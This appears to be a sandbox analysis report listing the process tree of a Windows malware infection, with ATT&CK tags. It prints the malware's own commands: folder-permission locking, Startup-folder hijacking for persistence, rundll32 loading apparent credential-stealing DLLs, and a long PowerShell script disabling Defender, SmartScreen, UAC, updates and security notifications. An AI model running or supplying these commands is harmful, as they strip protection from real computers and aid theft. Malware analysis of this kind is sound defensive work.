C:\Users\Admin\AppData\Local\Temp\10E6.tmp.exeC:\Users\Admin\AppData\Local\Temp\10E6.tmp.exe1⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\1B48.tmp.exeC:\Users\Admin\AppData\Local\Temp\1B48.tmp.exe1⤵PID:7324
-
C:\Users\Admin\AppData\Local\Temp\27FB.exeC:\Users\Admin\AppData\Local\Temp\27FB.exe1⤵PID:4248
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\d76f0cb0-fdfb-4d54-aa80-7dddcf254441" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
PID:6480
-
-
C:\Users\Admin\AppData\Local\Temp\27FB.exe"C:\Users\Admin\AppData\Local\Temp\27FB.exe" --Admin IsNotAutoStart IsNotTask2⤵PID:1976
-
C:\Users\Admin\AppData\Local\8115c25c-bdbe-41a1-9806-4b9278ed3dc2\5.exe"C:\Users\Admin\AppData\Local\8115c25c-bdbe-41a1-9806-4b9278ed3dc2\5.exe"3⤵PID:6300
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\8115c25c-bdbe-41a1-9806-4b9278ed3dc2\5.exe" & del C:\ProgramData\*.dll & exit4⤵PID:3824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
PID:3656
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3EFE.tmp.exeC:\Users\Admin\AppData\Local\Temp\3EFE.tmp.exe1⤵PID:7336
-
C:\ProgramData\eb0f642350\bkdm.exe"C:\ProgramData\eb0f642350\bkdm.exe"2⤵PID:2252
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\eb0f642350\3⤵PID:5112
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\eb0f642350\4⤵PID:8256
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\ProgramData\012e29e2d8a463\cred.dll, Main3⤵PID:7304
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\ProgramData\012e29e2d8a463\scr.dll, Main3⤵PID:5888
-
-
-
C:\Users\Admin\AppData\Local\Temp\4D86.tmp.exeC:\Users\Admin\AppData\Local\Temp\4D86.tmp.exe1⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\4D86.tmp.exe"C:\Users\Admin\AppData\Local\Temp\4D86.tmp.exe"2⤵PID:7760
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventOverride' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeShutdownErrs' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'AllOrNone' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeMicrosoftApps' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeWindowsApps' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKCU:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Scan_ScheduleDay' -Value 8; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideScan_ScheduleTime' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableEnhancedNotifications' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableGenericRePorts' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideSpynetReporting' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'SpynetReporting' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'SubmitSamplesConsent' -Value 2; $key='HKLM:\software\microsoft\Security Center';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AntiVirusDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'FirewallDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UpdatesDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UacDisableNotify' -Value 1; $key='HKLM:\software\Policies\Microsoft\MRT';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DontReportInfectionInformation' -Value 1; $key='HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose};New-ItemProperty -Path $key -Name 'DisableWindowsUpdateAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'SetDisableUXWUAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'DoNotConnectToWindowsUpdateInternetLocations' -Value 1 -Force -Verbose;New-ItemProperty -Path $key -Name 'DisableOSUpgrade' -Value 1 -Force -Verbose; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NoAutoUpdate' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableFeaturedSoftware' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AllowFastServiceStartup' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ServiceKeepAlive' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PUAProtection' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MpEnablePus' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRealtimeMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBehaviorMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableIOAVProtection' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableOnAccessProtection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRawWriteNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableScanOnRealtimeEnable' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\System';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableSmartScreen' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Features';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TamperProtection' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ProductStatus' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ManagedDefenderProductType' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRoutinelyTakingAction' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'OneTimeSqmDataSent' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Scan';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ScanParameters' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ScheduleDay' -Value 8; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TaskbarNoNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'HideSCAHealth' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'SmartScreenEnabled' -Type String -Value 'Off'; Set-ItemProperty 'HKLM:\software\microsoft\windows\currentversion\Explorer' -Force 'DisableNotificationCenter' -Value 1; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose SecurityHealth -ErrorAction SilentlyContinue;3⤵PID:5924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose WindowsDefender -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose 'Windows Defender' -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose MSC -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose AvastUI.exe -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose SecurityHealth -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose MSC -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose WindowsDefender -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose 'Windows Defender' -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose AvastUI.exe -ErrorAction SilentlyContinue; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Maintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MaintenanceDisabled' -Value 1; $key='HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Maintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MaintenanceDisabled' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\software\microsoft\windows\currentversion\AppHost';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableWebContentEvaluation' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AllowTelemetry' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DoNotShowFeedbackNotifications' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Personalization\Settings';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AcceptedPrivacyPolicy' -Value 0; $key='HKLM:\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Start' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Input\TIPC';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\Software\Microsoft\Internet Explorer\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV8' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\software\microsoft\windows\currentversion\policies\system';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableLUA' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ConsentPromptBehaviorAdmin' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'PromptOnSecureDesktop' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableInstallerDetection' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ConsentPromptBehaviorUser' -Value 3; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableSecureUIAPaths' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ValidateAdminCodeSignatures' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableVirtualization' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableUIADesktopToggle' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'FilterAdministratorToken' -Value 0; $key='HKLM:\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Start' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppCompat';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AITEnable' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableUAR' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\InputPersonalization';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'RestrictImplicitInkCollection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'RestrictImplicitTextCollection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'HarvestContacts' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\TabletPC';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventHandwritingDataSharing' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventHandwritingErrorReports' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\SQMClient\Windows';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'CEIPEnable' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'CorporateSQMURL' -Value '0.0.0.0';3⤵PID:5276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SOFTWARE\Policies\Microsoft\Office\16.0\osm';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enablelogging' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableUpload' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Siuf\Rules';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NumberOfSIUFInPeriod' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'PeriodInNanoSeconds' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NoExplicitFeedback' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\MediaPlayer\Preferences';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'UsageTracking' -Value 0;3⤵PID:6488
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4504
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4656
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9096
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4920
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7436
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5032
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8668
-
C:\Users\Admin\AppData\Local\Temp\880F.exeC:\Users\Admin\AppData\Local\Temp\880F.exe1⤵PID:8472
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5348
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8096
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5520
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5168
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\b640754bbd314e9ba04e11145813dcba /t 0 /p 55201⤵PID:6080
-
C:\Windows\system32\wlrmdr.exe-s -1 -f 2 -t You're about to be signed out -m Windows will shut down in less than a minute. -a 31⤵PID:344
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3aaa055 /state1:0x41c64e6d1⤵PID:4500
-
C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\kOTzNYG.exeC:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\kOTzNYG.exe 9n /site_id 754 /S1⤵PID:9128
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
3Web Service
1